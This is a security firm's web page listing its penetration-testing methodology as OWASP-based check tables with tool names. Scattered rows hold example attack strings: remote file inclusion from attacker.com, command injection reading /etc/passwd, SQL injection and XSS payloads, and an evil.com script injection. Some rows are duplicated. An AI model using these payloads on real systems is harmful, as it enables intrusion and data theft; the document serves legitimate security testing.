Call:1300 786 040 [email protected]
24 Hour Support Available

Pentesting Methodology

Pentesting methodology

Developed by BugXHunter

Penetration Testing Methodology

The below methodology is a combination of several operational penetration testing methodologies. Represented is the OWASP Testing Guide methodology (abbreviated as WSTG), The Web Application Hacker’s Handbook methodology (abbreviated as WAHHM), and BugXHunter’s own Vulnerability Rating Taxonomy classifications (abbreviated as VRT). These three resources are the de-facto standards for infrastructure and application testing professionals.

Each section is tested by the BugXHunter Penetration Tester and presented here. To satisfy PCI DSS requirements both automated and manual testing are performed in this methodology and common tools used in each check are listed in the “tools” column.

BizCover

Penetration Testing is completed as per the following

Operational Methodology Checks

1. Information Gathering

Methodology SectionTest DescriptionExample Tools
WSTG-INFO-01
WAHHM – Recon and Analysis
VRT Category – Sensitive Data Exposure		Use search engines to find sensitive information on websites and web applications that may be exposed due to missing or misconfigured controls like robots.txt or meta tags . Utilise search operators and advanced techniques, such as Google hacking or dorking, to locate data like network configurations, login details, or confidential files.Google Hacking
DuckDuckGo
Sitedigger
Shodan
FOCA
Punkspider
Methodology SectionTest DescriptionExample Tools
WSTG-INFO-02
WAHHM – Recon and Analysis
VRT Category – Server Security Misconfiguration		Identify the type and version of a web server that a target application runs on, to determine known vulnerabilities and the appropriate exploits. The test can be performed using HTTP header field ordering, banner grabbing, sending malformed requests to observe error responses, or using automated scanning tools that probe the server and compare its responses to a database of known signatures. Netcraft
Nikto
Nmap
Telnet
OpenSSL
Httprecon
httprint
WhatWeb
Wappalyzer
Netcat
Amap
Methodology SectionTest DescriptionExample Tools
WSTG-INFO-03
WAHHM – Recon and Analysis		Analyse robots.txt and identify <META> Tags from website.Browser
curl
wget
Methodology SectionTest DescriptionExample Tools
WSTG-INFO-04
WAHHM – Recon and Analysis		Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfersWebhosting .info
dnsrecon
Nmap
fierce
Recon-ng
Intrigue
Methodology SectionTest DescriptionExample Tools
WSTG-INFO-05
WAHHM – Recon and Analysis
VRT Category – Sensitive Data Exposure		Find sensitive information from webpage comments and Metadata on source code.Browser
curl
wget
Methodology SectionTest DescriptionExample Tools
WSTG-INFO-06
WAHHM – Recon and Analysis		Identify from hidden fields, parameters, methods HTTP header analysisBurp proxy
ZAP
Tamper data
Methodology SectionTest DescriptionExample Tools
WSTG-INFO-07
WAHHM – Recon and Analysis		Map the target application and understand the principal workflows.ZAP
Burp proxy
Methodology SectionTest DescriptionExample Tools
WSTG-INFO-08
WAHHM – Recon and Analysis		Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.Whatweb
BlindElephant
Wappalyzer
Methodology SectionTest DescriptionExample Tools
WSTG-INFO-09
WAHHM – Recon and Analysis
VRT Category – Several		Identify the web application and version to determine known vulnerabilities and the appropriate exploits.Whatweb
BlindElephant
Wappalyzer
CMSmap
Methodology Section Test Description Example Tools
WSTG-INFO-10 WAHHM – Recon and Analysis Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database Browser curl wget

2. Configuration and Deploy Management Testing

Methodology SectionTest DescriptionExample Tools
WSTG-CONFIG-01
WAHHM – Recon and Analysis, Assess Application Hosting
VRT Category – Server Security Misconfiguration		Understand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.Nessus
Methodology SectionTest DescriptionExample Tools
WSTG-CONFIG-02
WAHHM – Recon and Analysis
VRT Category – Server Security Misconfiguration		Identify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.Browser, Nikto
Methodology SectionTest DescriptionExample Tools
WSTG-CONFIG-03
WAHHM – Recon and Analysis
VRT Category – Sensitive Data Exposure

Find important file, information (.asa , .inc , .sql, zip, tar, pdf, txt, etc)

Browser, Nikto
Methodology SectionTest DescriptionExample Tools
WSTG-CONFIG-04
WAHHM – Recon and Analysis
VRT Category – Sensitive Data Exposure

Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename

Nessus, Nikto, Wikto
Methodology SectionTest DescriptionExample Tools
WSTG-CONFIG-05
WAHHM – Recon and Analysis

Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)

Burp Proxy, dirb, Dirbuster, fuzzdb, Tilde Scanner
Methodology SectionTest DescriptionExample Tools
WSTG-CONFIG-06
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration

Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST

netcat, curl
Methodology SectionTest DescriptionExample Tools
WSTG-CONFIG-07
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration

Identify HSTS header on Web server through HTTP response header.

curl -s -D- https://domain.com/ | grep Strict

Burp Proxy, ZAP, curl
Methodology SectionTest DescriptionExample Tools
WSTG-CONFIG-08
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration		Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.Nikto
OWASP Zed Attack Proxy Project
W3af

3. Identity Management Testing

Methodology SectionTest DescriptionExample Tools
WSTG-IDENT-01
WAHHM – Test Handling of Access
VRT Category – Broken Access Control (BAC)		Validate the system roles defined within the application by creating permission matrix.Burp Proxy, ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-IDENT-02
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration

Verify that the identity requirements for user registration are aligned with business and security requirements

Burp Proxy, ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-IDENT-03
WAHHM – Test Handling of Access

Determine which roles are able to provision users and what sort of accounts they can provision.

Burp Proxy, ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-IDENT-04
WAHHM – Test Handling of Access VRT Category – Server Security Misconfiguration

Generic login error statement check, return codes/parameter values, enumerate all possible valid userids (Login system, Forgot password).

Browser, Burp Proxy, ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-IDENT-05
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration

User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed.

Browser, Burp Proxy, ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-IDENT-06
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration

Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access.Evaluate consistency between access policy and guest/training account access permissions.

Burp Proxy, ZAP
Methodology Section Test Description Example Tools
WSTG-IDENT-07 WAHHM – Test Handling of Access VRT Category – Server Security Misconfiguration Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access.Evaluate consistency between access policy and guest/training account access permissions. Burp Proxy, ZAP

4. Authentication Testing

Methodology SectionTest DescriptionExample Tools
WSTG – AUTHN-001
WAHHM – Miscellaneous Tests
VRT Category – Broken Authentication and Session Management		Check referrer whether its HTTP or HTTPs. Sending data through HTTP and HTTPS.Burp Proxy, ZAP
Methodology SectionTest DescriptionExample Tools
WSTG – AUTHN-002
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration		Testing for default credentials of common applications, Testing for default password of new accounts.Burp Proxy, ZAP, Hydra
Methodology SectionTest DescriptionExample Tools
WSTG – AUTHN-003
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration

Evaluate the account lockout mechanism’s ability to mitigate brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.

Browser
Methodology SectionTest DescriptionExample Tools
WSTG – AUTHN-004
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management

Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection

Burp Proxy, ZAP
Methodology SectionTest DescriptionExample Tools
WSTG – AUTHN-005
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management

Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?

Burp Proxy, ZAP
Methodology SectionTest DescriptionExample Tools
WSTG – AUTHN-006
WAHHM – Miscellaneous Tests
VRT Category – Server Security Misconfiguration

Check browser history issue by clicking “Back” button after logging out. Check browser cache issue from HTTP response headers (Cache- Control: no-cache)

Burp Proxy
ZAP
Firefox add-on CacheView er2
Methodology SectionTest DescriptionExample Tools
WSTG – AUTHN-007
WAHHM – Test Handling of Access
VRT Category – Insufficient Security Configurability

Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of passwords.

Burp Proxy
ZAP
Hydra
Methodology SectionTest DescriptionExample Tools
WSTG – AUTHN-008
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management

Testing for weak pre-generated questions, Testing for weak self-generated question, Testing for brute-forcible answers (Unlimited attempts?)

Browser
Methodology SectionTest DescriptionExample Tools
WSTG – AUTHN-009
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management

Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?

Browser
Burp Proxy
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG – AUTHN-010
WAHHM – Test Handling of Access

Understand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)

Browser

5. Authorisation Testing

Methodology SectionTest DescriptionExample Tools
WSTG – AUTHZ-001
WAHHM – Test Handling of Input
VRT Category – Server- Side Injection

dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.

Burp Proxy
ZAP
Wfuzz
Methodology SectionTest DescriptionExample Tools
WSTG – AUTHZ-002
WAHHM – Test Handling of Access
VRT Category – Broken Access Control (BAC)

Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)

Burp Proxy (Autorize)
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-AUTHZ-003
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management

Testing for role/privilege manipulate the values of hidden variables. Change some param groupid=2 to groupid=1

Burp Proxy (Autorize)
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-AUTHZ-004
WAHHM – Test Handling of Access
VRT Category – Broken Access Control (BAC)		Force changing parameter value (?invoice=123 ->?invoice=456)Burp Proxy (Autorize)
ZAP

6. Session Management Testing

Methodology SectionTest DescriptionExample Tools
WSTG-SESS-01
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management		SessionID analysis prediction, unencrypted cookie transport, brute-force.Burp Proxy
ForceSSL
ZAP
CookieDigger
Methodology SectionTest DescriptionExample Tools
WSTG-SESS-02
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration		Check HTTPOnly and Secure flag, expiration, inspect for sensitive data.Burp Proxy
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-SESS-03
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management		The application doesn’t renew the cookie after a successfully user authentication.Burp Proxy
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-SESS-04
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management		Encryption & Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?Burp Proxy
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-SESS-05
WAHHM – Test Handling of Access
VRT Category – Cross- Site Request Forgery (CSRF)		URL analysis, Direct access to functions without any token.Burp Proxy (csrf_token
_detect)
burpy
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-SESS-06
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management		Check reuse session after logout both server-side and SSO.Burp Proxy
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-SESS-07
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management		Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.Burp Proxy
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-SESS-08
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management		The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.Burp Proxy
ZAP

7. Data Validation Testing

Methodology SectionTest DescriptionExample Tools
WSTG-INPV-01
WAHHM – Test Handling of Input		Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.Burp Proxy
ZAP
Xenotix XSS
Methodology SectionTest DescriptionExample Tools
WSTG-INPV-02
WAHHM – Test Handling of Input
VRT Category – Cross-Site Scripting (XSS)		Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEFBurp Proxy
ZAP
BeEF
XSS Proxy
Methodology SectionTest DescriptionExample Tools
WSTG-INPV-03
WAHHM – Test Handling of Input
VRT Category – Server Security Misconfiguration		Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.netcat
Methodology SectionTest DescriptionExample Tools
WSTG-INPV-04
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection		Identify any form or action that allows user- supplied input to bypass Input validation and filters using HPPZAP
HPP Finder (Chrome Plugin)
Methodology SectionTest DescriptionExample Tools
WSTG-INPVAL-005
WAHHM – Test Handling of Input
VRT Category – Server- Side Injection		Union, Boolean, Error based, Out-of-band, Time delay.Burp Proxy (SQLipy)
SQLMap
Pangolin
Seclists (FuzzDB)
 Oracle Testing
Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection		Orascan
SQLInjector
 MySQL Testing
Identify MySQL version, Single quote, Information_schema, Read/Write file.		SQLMap
Mysqloit
Power Injector
 SQL Server Testing
Comment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)		SQLMap
SQLninja
Power Injector
 Testing PostgreSQL
Determine that the backend database engine is PostgreSQL by using the :: cast operator.
Read/Write file, Shell Injection (OS command)		SQLMap
 MS Access Testing
Enumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.		SQLMap
 Testing for NoSQL injection
Identify NoSQL databases, Pass special characters (‘ ” \ ; { } ), Attack with reserved variable name, operator.		NoSQLMap
Methodology SectionTest DescriptionExample Tools
WSTG-INPV-06
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection		/ldapsearch?user=* user=*user=*)(uid=*))(|(uid=* pass=passwordZAP
Burp Proxy
Methodology SectionTest DescriptionExample Tools
WSTG-INPV-07
WAHHM – Test Handling of Input
VRT Category – Server- Side Injection		Testing ORM injection is identical to SQL injection testingHibernate
Nhibernate
Methodology SectionTest DescriptionExample Tools
WSTG-INPV-08
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection

Check with XML Meta Characters

‘, ” , <>, <!–/–>, &, <![CDATA[ / ]]>, XXE, TAG

Burp Proxy
ZAP
Wfuzz
Methodology SectionTest DescriptionExample Tools
WSTG-INPV-09
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
  • Presense of .shtml extension
  • Check for these characters

          < ! # = / . ” – > and [a-zA-Z0-9]

  • include String = <!–#include virtual=”/etc/passwd” –>

Burp Proxy
ZAP

Methodology SectionTest DescriptionExample Tools
WSTG-INPV-10
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection

Check for XML error enumeration by supplying a single quote (‘) Username: ‘ or ‘1’ = ‘1

Password: ‘ or ‘1’ = ‘1

Burp Proxy
ZAP

Methodology SectionTest DescriptionExample Tools
WSTG-INPV-11
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection
  • Identifying vulnerable parameters with special characters

           (i.e.: \, ‘, “, @, #, !, |)

  • Understanding the data flow and deployment structure of the client
  • IMAP/SMTP command injection (Header, Body, Footer)

Burp Proxy
ZAP

Methodology SectionTest DescriptionExample Tools
WSTG-INPV-12
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection		Enter OS commands in the input field.
?arg=1; system(‘id’)		Burp Proxy
ZAP
Liffy
Panoptic
 Testing for Local File Inclusion
LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)		Burp Proxy
fimap
Liffy
 Testing for Remote File Inclusion
RFI from malicious URL
?page.php?file=http://attacker.com/malicious_page		Burp Proxy
fimap
Liffy
Methodology SectionTest DescriptionExample Tools
WSTG-INPV-13
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection

Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.

%3Bcat%20/etc/passwd test.pdf+|+Dir C:\

Burp Proxy
ZAP
Commix

Methodology SectionTest DescriptionExample Tools
WSTG-INPV-14
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection		• Testing for heap overflow vulnerability
• Testing for stack overflow vulnerability
• Testing for format string vulnerability		Immunity Canvas
Spike
MSF
Nessus
 Testing for Heap overflow 
 Testing for Stack overflow 
 Testing for Format string 
Methodology SectionTest DescriptionExample Tools
WSTG-INPV-15
WAHHM – Test Handling of Input
VRT Category – Server Security Misconfiguration

File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)

Burp Proxy
BeEF
MSF

Methodology Section Test Description Example Tools
WSTG-INPV-16 WAHHM – Test Handling of Input VRT Category – Server-Side Injection param=foobar%0d%0aContent- Length:%200%0d%0a%0d%0aHTTP/1.1%20 200%20OK%0d%0aContent- Type:%20text/html%0d%0aContent- Length:%2035%0d%0a%0d%0a<html>Sorry, %20System%20Down</html> Burp Proxy ZAP netcat

8. Error Handling

Methodology SectionTest DescriptionExample Tools
WSTG-ERR-01
WAHHM – Recon and Analysis
VRT Category – Server Security Misconfiguration		Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)Burp Proxy
ZAP
Methodology Section Test Description Example Tools
WSTG-ERR-02 WAHHM – Recon and Analysis VRT Category – Server Security Misconfiguration
  • Invalid Input / Empty inputs
  • Input that contains non alphanumeric characters or query syntax
  • Access to internal pages without authentication
  • Bypassing application flow
 Burp Proxy ZAP

9. Cryptography

Methodology SectionTest DescriptionExample Tools
WSTG-CRYPST-01
WAHHM – Test Handling of Access
VRT Category – Server Security Misconfiguration

Identify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)

testssl.sh
SSL Breacher
Methodology SectionTest DescriptionExample Tools
WSTG-CRYPST-02
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management

Compare the responses in three different states:

  • Cipher text gets decrypted, resulting data is correct.
  • Cipher text gets decrypted, resulting data is garbled and causes some exception or error handling in the application logic.
  • Cipher text decryption fails due to padding errors.
testssl.sh
PadBuster
Poracle
python-paddingoracle
POET
Methodology SectionTest DescriptionExample Tools
WSTG-CRYPST-03
WAHHM – Test Handling of Access
VRT Category – Broken Authentication and Session Management

Check sensitive data during the transmission:

  • Information used in authentication (e.g. Credentials, PINs, Session identifiers, Tokens, Cookies…)
  • Information protected by laws, regulations or specific organizational policy (e.g. Credit Cards, Customers data)
Burp Proxy
ZAP
Curl

10. Business logic Testing

Methodology SectionTest DescriptionExample Tools
WSTG-BUSLOGIC-01
WAHHM – Test for Logic Flaws
VRT Category – Broken Access Control (BAC)
  • Looking for data entry points or hand off points between systems or software.
  • Once found try to insert logically invalid data into the application/system.
Burp Proxy
ZAP

Methodology SectionTest DescriptionExample Tools
WSTG-BUSLOGIC-02
WAHHM – Test for Logic Flaws
VRT Category – Server-Side Injection
  • Looking for guessable, predictable or hidden functionality of fields.
  • Once found try to insert logically valid data into the application/system allowing the user go through the application/system against the normal busineess logic workflow.

Burp Proxy
ZAP

Methodology SectionTest DescriptionExample Tools
WSTG-BUSLOGIC-03
WAHHM – Test for Logic Flaws
VRT Category – Broken Access Control (BAC)
  • Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information.
  • For each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component.
  • Attempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the busines logic workflow.

Burp Proxy
ZAP

Methodology SectionTest DescriptionExample Tools
WSTG-BUSLOGIC-04
WAHHM – Test for Logic Flaws
VRT Category – Server-Side Injection
  • Looking for application/system functionality that may be impacted by time. Such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time.
  • Develop and execute the mis-use cases ensuring that attackers can not gain an advantage based on any timing.

Burp Proxy
ZAP

Methodology SectionTest DescriptionExample Tools
WSTG-BUSLOGIC-05
WAHHM – Test for Logic Flaws
VRT Category – Broken Access Control (BAC)
  • Looking for functions or features in the application or system that should not be executed more that a single time or specified number of times during the business logic workflow.
  • For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.

Burp Proxy
ZAP

Methodology SectionTest DescriptionExample Tools
WSTG-BUSLOGIC-06
WAHHM – Test for Logic Flaws
VRT Category – Broken Access Control (BAC)
  • Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.
  • For each method develop a misuse case and try to circumvent or perform an action that is “not acceptable” per the the business logic workflow.

Burp Proxy
ZAP

Methodology SectionTest DescriptionExample Tools
WSTG-BUSLOGIC-07
WAHHM – Test for Logic Flaws

Measures that might indicate the application has in-built self-defense:

  • Changed responses
  • Blocked requests
  • Actions that log a user out or lock their account

Burp Proxy
ZAP

Methodology SectionTest DescriptionExample Tools
WSTG-BUSLOGIC-08
WAHHM – Test for Logic Flaws
  • Review the project documentation and perform some exploratory testing looking for file types that should be “unsupported” by the application/system.
  • Try to upload these “unsupported” files an verify that it are properly rejected.
  • If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.
PS. file.phtml, shell.phPWND, SHELL~1.PHP

Burp Proxy
ZAP

Methodology Section Test Description Example Tools
WSTG-BUSLOGIC-09 WAHHM – Test for Logic Flaws VRT Category – Server Security Misconfiguration
  • Develop or acquire a known “malicious”
  • Try to upload the malicious file to the application/system and verify that it is correctly
  • If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.
 Burp Proxy ZAP

11. Client Side Testing

Methodology SectionTest DescriptionExample Tools
WSTG-CLIENT-01
WAHHM – Miscellaneous Tests
VRT Category – Cross-Site Scripting (XSS)		Test for the user inputs obtained from client-side JavaScript ObjectsBurp Proxy
DOMinator
Methodology SectionTest DescriptionExample Tools
WSTG-CLIENT-02
WAHHM – Test Handling of Input
VRT Category – Cross-Site Scripting (XSS)		Inject JavaScript code: www.victim.com/?javascript:alert(1)Burp Proxy
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-CLIENT-03
WAHHM – Test Handling of Input
VRT Category – Server- Side Injection

Send malicious HTML code:

?user=<img%20src=’aaa’%20onerror=alert(1)>		Burp Proxy
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-CLIENT-04
WAHHM – Test Handling of Input
VRT Category – Unvalidated Redirects and Forwards

Modify untrusted URL input to a malicious site: (Open Redirect)

?redirect=www.fake-target.site

Burp Proxy
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-CLIENT-05
WAHHM – Test Handling of Input
VRT Category – Server-Side Injection

Inject code in the CSS context :

  • www.victim.com/#red;-o-link:’javascript:alert(1)’;- o-link-source:current; (Opera [8,12])
  • www.victim.com/#red;- :expression(alert(URL=1)); (IE 7/8)
Burp Proxy
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-CLIENT-06
WAHHM – Test Handling of Input
VRT Category – Server Security Misconfiguration		External JavaScript could be easily injected in the trusted web site www.victim.com/#http://evil.com/js.jsBurp Proxy
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-CLIENT-07
WAHHM – Miscellaneous Tests
VRT Category – Server Security Misconfiguration

Check the HTTP headers in order to understand how CORS is used (Origin Header)

Burp Proxy
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-CLIENT-08
WAHHM – Test Handling of Input
VRT Category – Server Security Misconfiguration

Decompile, Undefined variables, Unsafe methods, Include malicious SWF (http://victim/file.swf?lang=http://evil

FlashBang
Flare
Flasm
SWFScan
SWF Intruder
Methodology SectionTest DescriptionExample Tools
WSTG-CLIENT-09
WAHHM – Miscellaneous Tests
VRT Category – Server Security Misconfiguration

Decompile, Undefined variables, Unsafe methods, Include malicious SWF (http://victim/file.swf?lang=http://evil

Burp Proxy
Methodology SectionTest DescriptionExample Tools
WSTG-CLIENT-10
WAHHM – Test Handling of Input

Determine whether the website is storing sensitive data in the storage. XSS in localstorage http://server/StoragePOC.html#<img src=x onerror=alert(1)>

Chrome
Firebug
Burp Proxy
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-CLIENT-11
WAHHM – Test Handling of Input

Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains

Burp Proxy
ZAP
Methodology SectionTest DescriptionExample Tools
WSTG-CLIENT-12
WAHHM – Miscellaneous Tests
VRT Category – Server Security Misconfiguration

Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains

Burp Proxy
ZAP
Have Another Question?

  • Please note that your conversations will be recorded.

  • Hello, I am an AI bot. Ask me anything!

AI thinking ...